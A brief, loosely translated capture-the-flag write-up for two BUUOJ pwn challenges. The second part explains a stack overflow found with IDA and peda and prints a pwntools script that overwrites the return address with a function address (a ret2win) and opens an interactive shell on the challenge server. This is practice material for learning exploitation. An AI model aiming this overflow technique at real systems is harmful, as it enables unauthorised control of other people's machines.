PWN
1, there is even the flag of PWN
nc 6000 buuoj.cn get flag
2, RIP covering it
with ida analysis,
found that the existing system, just covering RIP is fun () address, the offset is calculated by peda 23, to write the script
from pwn import*
sh=remote('f.buuoj.cn',6001)
payload='a'*23+p64(0x401186)
sh.sendline(payload)
sh.interactive()
Get flag